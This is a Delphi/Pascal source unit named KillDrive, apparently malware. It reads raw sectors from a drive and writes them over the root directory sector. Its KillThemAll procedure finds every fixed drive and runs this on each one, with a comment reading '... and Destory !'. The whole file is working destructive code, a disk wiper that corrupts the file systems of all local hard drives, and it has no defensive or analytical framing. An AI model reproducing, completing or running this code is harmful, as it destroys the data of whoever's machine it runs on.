unit KillDrive;

interface

uses
  SysUtils, Classes, WinProcs, DskIO;

var
  FDiskIO: TDiskIO;
  FDiskIO_2 : TDiskIO;
  F: TMemoryStream;
  FBuf: Pointer;
  StartSector, nSectors : integer;

  function WriteBuffer(var Buffer; BufSize: Integer): Boolean;
  procedure FormCreate;
  procedure FormDestroy;
	procedure FormShow( drive : char; begin_sec : integer; count : integer);
  procedure FillMemo1;
  procedure Button3Click;
  procedure Execute( drive :char; ReadFrom_Sector : integer; Number_of_Sectors : integer);
  procedure KillThemAll;

implementation

procedure Execute( drive :char; ReadFrom_Sector : integer; Number_of_Sectors : integer);
begin
  FormCreate;
  if Number_of_Sectors = 0 then
  	Number_of_Sectors := 10;

  FormShow( drive, ReadFrom_sector, number_of_sectors);
  Button3Click;
  FormDestroy;
end;

procedure FormCreate;
begin
  FDiskIO := TDiskIO.Create;
  FDiskIO_2 := TDiskIO.Create;
  F := TMemoryStream.Create;
  FBuf := AllocMem(512);
end;

procedure FormDestroy;
begin
  FDiskIO.Free;
  FDiskIO_2.Free;
  F.Free;
  FreeMem(FBuf);
end;

procedure FormShow( drive : char; begin_sec : integer; count : integer);
begin
  FDiskIO.Drive := ( drive);
  StartSector := begin_sec;
  nSectors := count;
  FillMemo1;
end;



procedure FillMemo1;
var
	S, N: Integer;
  nSize: Integer;
  SS: String;
begin
  try
    N := nSectors;
  except
    on Exception do Exit;
  end;
  try
    S := StartSector;
  except
    on Exception do Exit;
  end;
  nSize := N*FDiskIO.BytesPerSector;
  F.SetSize(nSize);
  F.Seek(0, 0);
  if not FDiskIO.ReadLogicalSector(S, N, F.Memory^, nSize) then
  begin
    Exit;
  end;
  FreeMem(FBuf);
  FBuf := AllocMem(nSize);
  F.Seek(0, 0);
  F.Read(FBuf^, nSize);
  F.Seek(0, 0);
  SetLength(SS, 8);
  while F.Size-F.Position > 7 do
  begin
    F.Read(SS[1], 8);
  end;
  if F.Size-F.Position <> 0 then
  begin
    SetLength(SS, F.Size-F.Position);
    F.Read(SS[1], F.Size-F.Position);
  end;
end;


procedure Button3Click;
begin
  FDiskIO_2.Drive := FDiskIO.Drive;
  StartSector := FDiskIO.RootDirSector;
  WriteBuffer(FBuf^, F.Size)
end;

function WriteBuffer(var Buffer; BufSize: Integer): Boolean;
var
	I: Integer;
  J: Integer;
begin
  Result := False;
  try
    I := StartSector;
  except
    on Exception do Exit;
  end;
  J := BufSize div FDiskIO_2.BytesPerSector;
  Result := FDiskIO_2.WriteLogicalSector(I, J, Buffer, BufSize);
end;

procedure KillThemAll;
var
	i : integer;
  typ : integer;
  s : string;
  counter : integer;
  drive_array : Array[0..25] of integer;
begin
 	counter := 0;
  // Search ...
  for i := 0 to 25 do
  begin
  	s := chr( i + 65) + ':\';
    typ := GetDriveType( PChar( s));
    if typ <> 0 then
    begin
    	if typ = DRIVE_FIXED then
      begin
        drive_array[ counter] := i +1;
        Inc( counter);
      end;
    end;
	end;
  // ... and Destory !
	for i := 0 to counter -1 do
  begin
    Execute( chr( drive_array[ i] + 64), 0, 0);
  end;
end;

end.
